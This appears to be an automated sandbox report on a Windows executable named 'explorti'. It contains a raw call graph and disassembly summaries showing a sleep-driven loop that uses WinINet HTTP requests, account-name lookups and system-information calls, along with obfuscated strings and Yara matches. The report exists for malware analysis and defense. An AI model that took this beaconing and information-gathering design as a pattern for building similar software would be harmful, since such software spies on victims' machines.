14646 ecba61 14644->14646 14645 ecb985 GetPEB GetPEB 14645->14646 14646->14642 14646->14645 15100 e9e3e0 15101 e9e3e9 15100->15101 15102 e9e406 15100->15102 15104 e9e240 15101->15104 15105 e9e250 __dosmaperr 15104->15105 15106 ec8959 2 API calls 15105->15106 15108 e9e28d std::_Xinvalid_argument 15106->15108 15107 e9e406 15107->15102 15108->15107 15109 e9e240 2 API calls 15108->15109 15109->15107 15110 e9dfa0 recv 15111 e9e002 recv 15110->15111 15112 e9e037 recv 15111->15112 15114 e9e071 15112->15114 15113 e9e193 15114->15113 15115 eac5af GetSystemTimePreciseAsFileTime 15114->15115 15116 e9e1ce 15115->15116 15117 eac16d 7 API calls 15116->15117 15118 e9e238 15117->15118 14647 ea1da0 14648 ea1e3b shared_ptr __dosmaperr 14647->14648 14663 ea1e48 shared_ptr std::_Xinvalid_argument 14648->14663 14666 ec8959 14648->14666 14651 ea253b 14654 e9e9b0 2 API calls 14651->14654 14652 ea2487 14655 e9e9b0 2 API calls 14652->14655 14653 ea225d 14681 e9e9b0 14653->14681 14660 ea22c1 shared_ptr 14654->14660 14655->14660 14658 ea238a 14659 e9e9b0 2 API calls 14658->14659 14659->14660 14660->14663 14670 ec66c7 14660->14670 14661 ea265b shared_ptr __dosmaperr 14662 ec8959 2 API calls 14661->14662 14661->14663 14664 ea2729 14662->14664 14664->14663 14674 e95dd0 14664->14674 14667 ec8974 14666->14667 14691 ec86b7 14667->14691 14669 ea2235 14669->14651 14669->14652 14669->14653 14669->14658 14669->14660 14669->14663 14672 ec66d3 14670->14672 14671 ec66dd __cftof __dosmaperr 14671->14661 14672->14671 14715 ec6650 14672->14715 14676 e95e08 14674->14676 14675 e95eee shared_ptr 14675->14663 14676->14675 14677 e96040 RegOpenKeyExA 14676->14677 14679 e9643a shared_ptr 14677->14679 14680 e96093 __cftof 14677->14680 14678 e96133 RegEnumValueW 14678->14680 14679->14663 14680->14678 14680->14679 14682 e9e9f9 shared_ptr 14681->14682 14684 e9eb08 shared_ptr 14682->14684 14686 e9f597 shared_ptr 14682->14686 14685 e9ee46 shared_ptr 14684->14685 14738 e9ae20 14684->14738 14685->14660 14687 ec66c7 2 API calls 14686->14687 14690 e9f862 shared_ptr std::_Xinvalid_argument 14686->14690 14688 e9fbd2 shared_ptr __dosmaperr 14687->14688 14689 ec8959 2 API calls 14688->14689 14688->14690 14689->14690 14690->14660 14692 ec86c9 14691->14692 14693 ec681a __fassign 2 API calls 14692->14693 14694 ec86de __cftof __dosmaperr 14692->14694 14696 ec870e 14693->14696 14694->14669 14696->14694 14697 ec8905 14696->14697 14698 ec8942 14697->14698 14699 ec8912 14697->14699 14708 ecd2c9 14698->14708 14702 ec8921 __fassign 14699->14702 14703 ecd2ed 14699->14703 14702->14696 14704 ec681a __fassign 2 API calls 14703->14704 14705 ecd30a 14704->14705 14707 ecd31a 14705->14707 14712 ecf05f 14705->14712 14707->14702 14709 ecd2d4 14708->14709 14710 ecb49b __fassign 2 API calls 14709->14710 14711 ecd2e4 14710->14711 14711->14702 14713 ec681a __fassign 2 API calls 14712->14713 14714 ecf07f __cftof __fassign __freea 14713->14714 14714->14707 14716 ec6672 14715->14716 14718 ec665d __cftof __dosmaperr ___free_lconv_mon 14715->14718 14716->14718 14719 ec9ed9 14716->14719 14718->14671 14720 ec9ef1 14719->14720 14722 ec9f16 14719->14722 14720->14722 14723 ed02d8 14720->14723 14722->14718 14724 ed02e4 14723->14724 14726 ed02ec __cftof __dosmaperr 14724->14726 14727 ed03ca 14724->14727 14726->14722 14728 ed03ec 14727->14728 14730 ed03f0 __cftof __dosmaperr 14727->14730 14728->14730 14731 ecfb5f 14728->14731 14730->14726 14732 ecfbac 14731->14732 14733 ec681a __fassign 2 API calls 14732->14733 14737 ecfbbb __cftof 14733->14737 14734 ecd2c9 2 API calls 14734->14737 14735 ecc4ca GetPEB GetPEB __fassign 14735->14737 14736 ecfe5b 14736->14730 14737->14734 14737->14735 14737->14736 14739 e9ae63 __cftof 14738->14739 14742 e954e0 14739->14742 14741 e9af4e 14743 e95500 14742->14743 14745 e95600 14743->14745 14746 e921c0 14743->14746 14745->14741 14749 e92180 14746->14749 14750 e92196 14749->14750 14753 ec8647 14750->14753 14756 ec7436 14753->14756 14755 e921a4 14755->14743 14757 ec7476 14756->14757 14759 ec745e __cftof __dosmaperr 14756->14759 14758 ec681a __fassign 2 API calls 14757->14758 14757->14759 14760 ec748e 14758->14760 14759->14755 14762 ec79f1 14760->14762 14763 ec7a02 14762->14763 14764 ec7a11 __cftof __dosmaperr 14763->14764 14769 ec7f95 14763->14769 14774 ec7bef 14763->14774 14779 ec7c15 14763->14779 14789 ec7d63 14763->14789 14764->14759 14770 ec7f9e 14769->14770 14771 ec7fa5 14769->14771 14798 ec797d 14770->14798 14771->14763 14773 ec7fa4 14773->14763 14775 ec7bff 14774->14775 14776 ec7bf8 14774->14776 14775->14763 14777 ec797d 2 API calls 14776->14777 14778 ec7bfe 14777->14778 14778->14763 14780 ec7c36 __cftof __dosmaperr 14779->14780 14781 ec7c1c 14779->14781 14780->14763 14781->14780 14782 ec7d96 14781->14782 14784 ec7dcf 14781->14784 14787 ec7da4 14781->14787 14782->14787 14788 ec7db8 14782->14788 14806 ec806e 14782->14806 14784->14788 14802 ec81bd 14784->14802 14787->14788 14810 ec8517 14787->14810 14788->14763 14790 ec7d96 14789->14790 14791 ec7d7c 14789->14791 14792 ec806e 2 API calls 14790->14792 14796 ec7da4 14790->14796 14797 ec7db8 14790->14797 14791->14790 14793 ec7dcf 14791->14793 14791->14796 14792->14796 14794 ec81bd 2 API calls 14793->14794 14793->14797 14794->14796 14795 ec8517 2 API calls 14795->14797 14796->14795 14796->14797 14797->14763 14799 ec798f __dosmaperr 14798->14799 14800 ec8959 GetPEB GetPEB 14799->14800 14801 ec79b2 __dosmaperr 14800->14801 14801->14773 14803 ec81d8 14802->14803 14804 ec820a 14803->14804 14805 ecc63f __cftof GetPEB GetPEB 14803->14805 14804->14787 14805->14804 14807 ec8087 14806->14807 14808 ecd179 GetPEB GetPEB 14807->14808 14809 ec813a 14808->14809 14809->14787 14809->14809 14811 ec858a 14810->14811 14813 ec8534 14810->14813 14811->14788 14812 ecc63f __cftof GetPEB GetPEB 14812->14813 14813->14811 14813->14812 14814 ea92e0 14815 ea92f5 14814->14815 14819 ea9333 14814->14819 14820 ead017 14815->14820 14817 ea92ff 14817->14819 14824 eacfcd 14817->14824 14822 ead028 14820->14822 14821 ead030 14821->14817 14822->14821 14828 ead09f 14822->14828 14825 eacfdd 14824->14825 14826 ead085 14825->14826 14827 ead081 RtlWakeAllConditionVariable 14825->14827 14826->14819 14827->14819 14829 ead0ad SleepConditionVariableCS 14828->14829 14831 ead0c6 14828->14831 14829->14831 14831->14822 15119 eab7b9 15120 eab6b5 8 API calls 15119->15120 15121 eab7e1 Concurrency::details::_Reschedule_chore 15120->15121 15122 eab806 15121->15122 15126 eacab1 15121->15126 15124 eab618 8 API calls 15122->15124 15125 eab81e 15124->15125 15127 eacacf 15126->15127 15128 eacabf TpCallbackUnloadDllOnCompletion 15126->15128 15127->15122 15128->15127 15135 ec6539 15136 ec63d7 __fassign 2 API calls 15135->15136 15137 ec654a 15136->15137 15130 ec6954 15131 ec696c 15130->15131 15132 ec6962 15130->15132 15133 ec689d 2 API calls 15131->15133 15134 ec6986 ___free_lconv_mon 15133->15134 15040 e98690 15041 e98696 15040->15041 15042 e986b6 15041->15042 15043 ec66c7 2 API calls 15041->15043 15044 e986b0 15043->15044 14832 ea86d0 14833 ea872a __cftof 14832->14833 14839 ea9ab0 14833->14839 14835 ea8754 14838 ea876c 14835->14838 14843 e942f0 14835->14843 14837 ea87d9 std::_Throw_future_error 14840 ea9ae5 14839->14840 14849 e92be0 14840->14849 14842 ea9b16 14842->14835 14844 eabddf InitOnceExecuteOnce 14843->14844 14845 e9430a 14844->14845 14846 e94311 14845->14846 14847 ec6bcb 6 API calls 14845->14847 14846->14837 14848 e94324 14847->14848 14850 e92c1d 14849->14850 14858 eabddf 14850->14858 14852 e92c88 14868 e92340 14852->14868 14853 e92c46 14853->14852 14854 e92c51 14853->14854 14861 eabdf7 14853->14861 14854->14842 14871 eacb34 14858->14871 14862 eabe03 std::_Xinvalid_argument 14861->14862 14863 eabe6a 14862->14863 14864 eabe73 14862->14864 14875 eabd7f 14863->14875 14881 e929e0 14864->14881 14867 eabe6f 14867->14852 14907 eab4d6 14868->14907 14870 e92372 14872 eacb42 InitOnceExecuteOnce 14871->14872 14874 eabdf2 14871->14874 14872->14874 14874->14853 14876 eacb34 InitOnceExecuteOnce 14875->14876 14877 eabd97 14876->14877 14878 eabd9e 14877->14878 14895 ec6bcb 14877->14895 14878->14867 14880 eabda7 14880->14867 14882 eabddf InitOnceExecuteOnce 14881->14882 14886 e929f4 14882->14886 14883 e929ff 14883->14867 14884 ec8a8f __fassign 2 API calls 14885 ec6c06 14884->14885 14887 ec6c15 14885->14887 14888 ec6c23 14885->14888 14886->14883 14886->14884 14889 ec6c79 6 API calls 14887->14889 14890 ec689d 2 API calls 14888->14890 14891 ec6c1f 14889->14891 14892 ec6c3d 14890->14892 14891->14867 14893 ec6c79 6 API calls 14892->14893 14894 ec6c51 ___free_lconv_mon 14892->14894 14893->14894 14894->14867 14896 ec6bd7 14895->14896 14897 ec8a8f __fassign 2 API calls 14896->14897 14898 ec6c06 14897->14898 14899 ec6c15 14898->14899 14900 ec6c23 14898->14900 14901 ec6c79 6 API calls 14899->14901 14902 ec689d 2 API calls 14900->14902 14903 ec6c1f 14901->14903 14904 ec6c3d 14902->14904 14903->14880 14905 ec6c79 6 API calls 14904->14905 14906 ec6c51 ___free_lconv_mon 14904->14906 14905->14906 14906->14880 14908 eab4f1 std::_Xinvalid_argument 14907->14908 14909 ec8a8f __fassign 2 API calls 14908->14909 14911 eab558 __fassign 14908->14911 14910 eab59f 14909->14910 14911->14870 14912 ea6ab0 14913 ea6ae0 14912->14913 14916 ea4690 14913->14916 14915 ea6b2c Sleep 14915->14913 14919 ea46cb 14916->14919 14931 ea4d53 shared_ptr std::_Xinvalid_argument 14916->14931 14917 ea4e39 shared_ptr 14917->14915 14919->14931 14939 e9bd30 14919->14939 14921 ea4fbe shared_ptr 14987 e97ce0 14921->14987 14922 ea4ef5 shared_ptr 14922->14921 14926 ea6a86 14922->14926 14924 ea4fcd 14993 e98290 14924->14993 14927 ea4690 17 API calls 14926->14927 14929 ea6b2c Sleep 14927->14929 14928 ea49dd 14930 e9bd30 5 API calls 14928->14930 14928->14931 14929->14926 14934 ea4a42 shared_ptr 14930->14934 14931->14917 14977 e96590 14931->14977 14932 ea4723 shared_ptr __dosmaperr 14932->14928 14932->14931 14933 ec8959 2 API calls 14932->14933 14933->14928 14934->14931 14934->14934 14935 ea4d3c 14934->14935 14950 ea4270 14935->14950 14937 ea4d50 14937->14931 14938 ea4fe6 shared_ptr 14938->14915 14940 e9bd82 14939->14940 14942 e9c11e shared_ptr 14939->14942 14941 e9bd96 InternetOpenW InternetConnectA 14940->14941 14940->14942 14943 e9be0d 14941->14943 14942->14932 14944 e9be23 HttpOpenRequestA 14943->14944 14945 e9be41 shared_ptr 14944->14945 14946 e9bee3 HttpSendRequestA 14945->14946 14948 e9befb shared_ptr 14946->14948 14947 e9bf83 InternetReadFile 14949 e9bfaa 14947->14949 14948->14947 14951 ea42b2 14950->14951 14953 ea4526 14951->14953 14963 ea42d8 shared_ptr 14951->14963 14952 ea465e shared_ptr 14952->14937 14954 ea3520 8 API calls 14953->14954 14957 ea44f0 shared_ptr 14954->14957 14955 ea4e39 shared_ptr 14955->14937 14956 e96590 3 API calls 14960 ea4ef5 shared_ptr 14956->14960 14957->14952 14958 e9bd30 5 API calls 14957->14958 14971 ea4d50 shared_ptr std::_Xinvalid_argument 14957->14971 14972 ea4723 shared_ptr __dosmaperr 14958->14972 14959 ea4fbe shared_ptr 14961 e97ce0 3 API calls 14959->14961 14960->14959 14966 ea6a86 14960->14966 14962 ea4fcd 14961->14962 14965 e98290 GetNativeSystemInfo 14962->14965 14963->14957 14997 ea3520 14963->14997 14976 ea4fe6 shared_ptr 14965->14976 14967 ea4690 17 API calls 14966->14967 14969 ea6b2c Sleep 14967->14969 14968 ea49dd 14970 e9bd30 5 API calls 14968->14970 14968->14971 14969->14966 14974 ea4a42 shared_ptr 14970->14974 14971->14955 14971->14956 14972->14968 14972->14971 14973 ec8959 2 API calls 14972->14973 14973->14968 14974->14971 14975 ea4270 17 API calls 14974->14975 14975->14971 14976->14937 14986 4a10d48 14977->14986 14978 e965ef LookupAccountNameA 14979 e96642 14978->14979 14980 e921c0 2 API calls 14979->14980 14981 e96679 shared_ptr 14980->14981 14982 e921c0 2 API calls 14981->14982 14983 e96802 shared_ptr 14981->14983 14984 e96707 shared_ptr 14982->14984 14983->14922 14984->14983 14985 e921c0 2 API calls 14984->14985 14985->14984 14986->14978 14988 e97d46 shared_ptr __cftof 14987->14988 14989 e97e83 GetNativeSystemInfo 14988->14989 14990 e97e87 14988->14990 14992 e97e98 shared_ptr 14988->14992 14989->14990 14990->14992 15037 ec8a61 14990->15037 14992->14924 14994 e982f5 shared_ptr __cftof 14993->14994 14995 e98434 GetNativeSystemInfo 14994->14995 14996 e98313 14994->14996 14995->14996 14996->14938 14998 ea355f shared_ptr __dosmaperr 14997->14998 15001 ea3a82 shared_ptr std::_Xinvalid_argument 14997->15001 14999 ec8959 2 API calls 14998->14999 14998->15001 15000 ea3a5a 14999->15000 15000->15001 15002 ea3b6d 15000->15002 15003 ea3e22 15000->15003 15001->14963 15006 ea1da0 15002->15006 15025 ea2df0 15003->15025 15007 ea1e3b shared_ptr __dosmaperr 15006->15007 15008 ec8959 2 API calls 15007->15008 15022 ea1e48 shared_ptr std::_Xinvalid_argument 15007->15022 15009 ea2235 15008->15009 15010 ea253b 15009->15010 15011 ea2487 15009->15011 15012 ea225d 15009->15012 15017 ea238a 15009->15017 15019 ea22c1 shared_ptr 15009->15019 15009->15022 15013 e9e9b0 2 API calls 15010->15013 15014 e9e9b0 2 API calls 15011->15014 15016 e9e9b0 2 API calls 15012->15016 15013->15019 15014->15019 15015 ec66c7 2 API calls 15020 ea265b shared_ptr __dosmaperr 15015->15020 15016->15019 15018 e9e9b0 2 API calls 15017->15018 15018->15019 15019->15015 15019->15022 15021 ec8959 2 API calls 15020->15021 15020->15022 15023 ea2729 15021->15023 15022->15001 15023->15022 15024 e95dd0 2 API calls 15023->15024 15024->15022 15026 ea2e95 shared_ptr __cftof 15025->15026 15031 ea2e34 shared_ptr __dosmaperr 15025->15031 15027 ea32ae InternetCloseHandle InternetCloseHandle 15026->15027 15028 ea32c2 InternetCloseHandle InternetCloseHandle 15026->15028 15026->15031 15027->15026 15028->15026 15029 ec8959 2 API calls 15030 ea3a5a 15029->15030 15032 ea3e22 15030->15032 15034 ea34ea shared_ptr std::_Xinvalid_argument 15030->15034 15035 ea3b6d 15030->15035 15031->15029 15031->15034 15033 ea2df0 4 API calls 15032->15033 15033->15034 15034->15001 15036 ea1da0 4 API calls 15035->15036 15036->15034 15038 ec86b7 2 API calls 15037->15038 15039 ec8a7f 15038->15039 15039->14992 15138 eaa110 15139 eaa190 15138->15139 15145 ea7010 15139->15145 15141 eaa1cc shared_ptr 15142 eaa3be shared_ptr 15141->15142 15149 e93de0 15141->15149 15144 eaa3a6 15147 ea7051 __cftof __Mtx_init_in_situ 15145->15147 15146 ea7286 15146->15141 15147->15146 15155 e92dc0 15147->15155 15150 e93e48 15149->15150 15151 e93e1e 15149->15151 15152 e93e58 15150->15152 15202 e92b00 15150->15202 15151->15144 15152->15144 15156 e92e7e GetCurrentThreadId 15155->15156 15157 e92e06 15155->15157 15158 e92e94 15156->15158 15159 e92eef 15156->15159 15160 eac5af GetSystemTimePreciseAsFileTime 15157->15160 15158->15159 15165 eac5af GetSystemTimePreciseAsFileTime 15158->15165 15159->15146 15161 e92e12 15160->15161 15162 e92f1e 15161->15162 15166 e92e1d __Mtx_unlock 15161->15166 15163 eac16d 7 API calls 15162->15163 15164 e92f24 15163->15164 15167 eac16d 7 API calls 15164->15167 15168 e92eb9 15165->15168 15166->15164 15169 e92e6f 15166->15169 15167->15168 15170 eac16d 7 API calls 15168->15170 15171 e92ec0 __Mtx_unlock 15168->15171 15169->15156 15169->15159 15170->15171 15172 eac16d 7 API calls 15171->15172 15173 e92ed8 __Cnd_broadcast 15171->15173 15172->15173 15173->15159 15174 eac16d 7 API calls 15173->15174 15175 e92f3c 15174->15175 15176 eac5af GetSystemTimePreciseAsFileTime 15175->15176 15184 e92f80 shared_ptr __Mtx_unlock 15176->15184 15177 e930c5 15178 eac16d 7 API calls 15177->15178 15179 e930cb 15178->15179 15180 eac16d 7 API calls 15179->15180 15181 e930d1 15180->15181 15182 eac16d 7 API calls 15181->15182 15190 e93093 __Mtx_unlock 15182->15190 15183 e930a7 15183->15146 15184->15177 15184->15179 15184->15183 15187 e93032 GetCurrentThreadId 15184->15187 15185 eac16d 7 API calls 15186 e930dd 15185->15186 15187->15183 15188 e9303b 15187->15188 15188->15183 15189 eac5af GetSystemTimePreciseAsFileTime 15188->15189 15191 e9305f 15189->15191 15190->15183 15190->15185 15191->15177 15191->15181 15191->15190 15193 eabc4c 15191->15193 15196 eaba72 15193->15196 15195 eabc5c 15195->15191 15197 eaba9c 15196->15197 15198 eace6e _xtime_get GetSystemTimePreciseAsFileTime 15197->15198 15201 eabaa4 __Xtime_diff_to_millis2 15197->15201 15199 eabacf __Xtime_diff_to_millis2 15198->15199 15200 eace6e _xtime_get GetSystemTimePreciseAsFileTime 15199->15200 15199->15201 15200->15201 15201->15195 15203 e92b0e 15202->15203 15209 eab747 15203->15209 15205 e92b42 15206 e92b49 15205->15206 15215 e92b80 15205->15215 15206->15144 15208 e92b58 std::_Xinvalid_argument 15210 eab754 15209->15210 15213 eab773 Concurrency::details::_Reschedule_chore 15209->15213 15218 eaca7a 15210->15218 15212 eab764 15212->15213 15220 eab71e 15212->15220 15213->15205 15226 eab6fb 15215->15226 15217 e92bb2 shared_ptr 15217->15208 15219 eaca95 CreateThreadpoolWork 15218->15219 15219->15212 15221 eab727 Concurrency::details::_Reschedule_chore 15220->15221 15224 eacccf 15221->15224 15223 eab741 15223->15213 15225 eacce4 TpPostWork 15224->15225 15225->15223 15227 eab717 15226->15227 15228 eab707 15226->15228 15227->15217 15228->15227 15230 eac97b 15228->15230 15231 eac990 TpReleaseWork 15230->15231 15231->15227

                      Executed Functions

                      Function 00E9BD30 Relevance: 23.1, APIs: 5, Strings: 8, Instructions: 310networkfileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1632 e9bd30-e9bd7c 1633 e9c171-e9c196 call ea7f00 1632->1633 1634 e9bd82-e9bd86 1632->1634 1639 e9c198-e9c1a4 1633->1639 1640 e9c1c4-e9c1dc 1633->1640 1634->1633 1636 e9bd8c-e9bd90 1634->1636 1636->1633 1638 e9bd96-e9be1f InternetOpenW InternetConnectA call ea7840 call e95b00 1636->1638 1662 e9be21 1638->1662 1663 e9be23-e9be3f HttpOpenRequestA 1638->1663 1642 e9c1ba-e9c1c1 call ead569 1639->1642 1643 e9c1a6-e9c1b4 1639->1643 1644 e9c128-e9c140 1640->1644 1645 e9c1e2-e9c1ee 1640->1645 1642->1640 1643->1642 1647 e9c23f-e9c244 call ec6b7a 1643->1647 1651 e9c213-e9c22f call eacef4 1644->1651 1652 e9c146-e9c152 1644->1652 1649 e9c11e-e9c125 call ead569 1645->1649 1650 e9c1f4-e9c202 1645->1650 1649->1644 1650->1647 1658 e9c204 1650->1658 1659 e9c209-e9c210 call ead569 1652->1659 1660 e9c158-e9c166 1652->1660 1658->1649 1659->1651 1660->1647 1668 e9c16c 1660->1668 1662->1663 1669 e9be41-e9be50 1663->1669 1670 e9be70-e9bedf call ea7840 call e95b00 call ea7840 call e95b00 1663->1670 1668->1659 1672 e9be52-e9be60 1669->1672 1673 e9be66-e9be6d call ead569 1669->1673 1684 e9bee1 1670->1684 1685 e9bee3-e9bef9 HttpSendRequestA 1670->1685 1672->1673 1673->1670 1684->1685 1686 e9befb-e9bf0a 1685->1686 1687 e9bf2a-e9bf52 1685->1687 1688 e9bf0c-e9bf1a 1686->1688 1689 e9bf20-e9bf27 call ead569 1686->1689 1690 e9bf83-e9bfa4 InternetReadFile 1687->1690 1691 e9bf54-e9bf63 1687->1691 1688->1689 1689->1687 1695 e9bfaa 1690->1695 1693 e9bf79-e9bf80 call ead569 1691->1693 1694 e9bf65-e9bf73 1691->1694 1693->1690 1694->1693 1698 e9bfb0-e9c060 call ec4160 1695->1698
                      APIs
                      • InternetOpenW.WININET(00EE8D18,00000000,00000000,00000000,00000000), ref: 00E9BDBC
                      • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00E9BDE1
                      • HttpOpenRequestA.WININET(?,00000000), ref: 00E9BE2A
                      • HttpSendRequestA.WININET(?,00000000), ref: 00E9BEEB
                      • InternetReadFile.WININET(?,?,000003FF,?), ref: 00E9BF9D
                      • InternetCloseHandle.WININET(?), ref: 00E9C077
                      • InternetCloseHandle.WININET(?), ref: 00E9C07F
                      • InternetCloseHandle.WININET(?), ref: 00E9C087
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      • Associated: 00000007.00000002.2881011740.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881028373.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881083170.0000000000EF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001156000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001185000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.000000000119E000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881346985.000000000119F000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881451190.000000000133A000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881467711.000000000133B000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881481711.000000000133C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881496630.000000000133D000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                      • String ID: UfNm$Ux1MTw==$aAJTaDE6OpZ=$aAJTazgvOn==$invalid stoi argument$stoi argument out of range$3$k
                      • API String ID: 688256393-3541917878
                      • Opcode ID: 1c015bdabd87190daf1f6dc4a462968d446d6be276003026ce6eb90ae4b0acea
                      • Instruction ID: 8851d719b0e8924db848d7b7a9582653bcc1cf4364867d312a64ae7b7f08690d
                      • Opcode Fuzzy Hash: 1c015bdabd87190daf1f6dc4a462968d446d6be276003026ce6eb90ae4b0acea
                      • Instruction Fuzzy Hash: C9B1D4B1A001189BDF28DF28CD85BEEBBB9EF45304F605198F509A7292D7759AC0CF94
                      Function 00E96590 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2013 e96590-e965e9 2087 e965ea call 4a10d61 2013->2087 2088 e965ea call 4a10da4 2013->2088 2089 e965ea call 4a10df4 2013->2089 2090 e965ea call 4a10d66 2013->2090 2091 e965ea call 4a10d48 2013->2091 2092 e965ea call 4a10e38 2013->2092 2093 e965ea call 4a10d7c 2013->2093 2014 e965ef-e96668 LookupAccountNameA call ea7840 call e95b00 2020 e9666a 2014->2020 2021 e9666c-e9668b call e921c0 2014->2021 2020->2021 2024 e9668d-e9669c 2021->2024 2025 e966bc-e966c2 2021->2025 2026 e9669e-e966ac 2024->2026 2027 e966b2-e966b9 call ead569 2024->2027 2028 e966c5-e966ca 2025->2028 2026->2027 2029 e968e7 call ec6b7a 2026->2029 2027->2025 2028->2028 2031 e966cc-e966f4 call ea7840 call e95b00 2028->2031 2036 e968ec call ec6b7a 2029->2036 2042 e966f8-e96719 call e921c0 2031->2042 2043 e966f6 2031->2043 2040 e968f1-e968f6 call ec6b7a 2036->2040 2047 e9671b-e9672a 2042->2047 2048 e9674a-e9675e 2042->2048 2043->2042 2049 e9672c-e9673a 2047->2049 2050 e96740-e96747 call ead569 2047->2050 2054 e96808-e9682c 2048->2054 2055 e96764-e9676a 2048->2055 2049->2036 2049->2050 2050->2048 2057 e96830-e96835 2054->2057 2056 e96770-e9679d call ea7840 call e95b00 2055->2056 2070 e9679f 2056->2070 2071 e967a1-e967c8 call e921c0 2056->2071 2057->2057 2058 e96837-e9689c call ea7f00 * 2 2057->2058 2068 e968c9-e968e6 call eacef4 2058->2068 2069 e9689e-e968ad 2058->2069 2072 e968bf-e968c6 call ead569 2069->2072 2073 e968af-e968bd 2069->2073 2070->2071 2080 e967f9-e967fc 2071->2080 2081 e967ca-e967d9 2071->2081 2072->2068 2073->2040 2073->2072 2080->2056 2084 e96802 2080->2084 2082 e967db-e967e9 2081->2082 2083 e967ef-e967f6 call ead569 2081->2083 2082->2029 2082->2083 2083->2080 2084->2054 2087->2014 2088->2014 2089->2014 2090->2014 2091->2014 2092->2014 2093->2014
                      APIs
                      • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00E96630
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      • Associated: 00000007.00000002.2881011740.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881028373.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881083170.0000000000EF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001156000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001185000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.000000000119E000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881346985.000000000119F000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881451190.000000000133A000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881467711.000000000133B000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881481711.000000000133C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881496630.000000000133D000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: AccountLookupName
                      • String ID: JLTlbM==$LLNlbM==$UrSe DMt
                      • API String ID: 1484870144-2175010088
                      • Opcode ID: 26a525638347688097e27bef03bc38b92b3d17b96719179bcf16ed2be1015450
                      • Instruction ID: 4e5f3def470547da13960ba0e5a089fce8bd61167e2eb369535aa457c2172c3a
                      • Opcode Fuzzy Hash: 26a525638347688097e27bef03bc38b92b3d17b96719179bcf16ed2be1015450
                      • Instruction Fuzzy Hash: 6791D3B19001189BDF29DB24CC85BEDB7B9EB45304F4055EAE509E7292DA349FC4CFA4
                      Function 00EA4270 Relevance: 42.8, APIs: 1, Strings: 22, Instructions: 2558sleepCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EA7840: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00EA792C
                        • Part of subcall function 00EA7840: __Cnd_destroy_in_situ.LIBCPMT ref: 00EA7938
                        • Part of subcall function 00EA7840: __Mtx_destroy_in_situ.LIBCPMT ref: 00EA7941
                        • Part of subcall function 00E9BD30: InternetOpenW.WININET(00EE8D18,00000000,00000000,00000000,00000000), ref: 00E9BDBC
                        • Part of subcall function 00E9BD30: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00E9BDE1
                        • Part of subcall function 00E9BD30: HttpOpenRequestA.WININET(?,00000000), ref: 00E9BE2A
                      • std::_Xinvalid_argument.LIBCPMT ref: 00EA4E72
                      • Sleep.KERNELBASE ref: 00EA6B35
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      • Associated: 00000007.00000002.2881011740.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
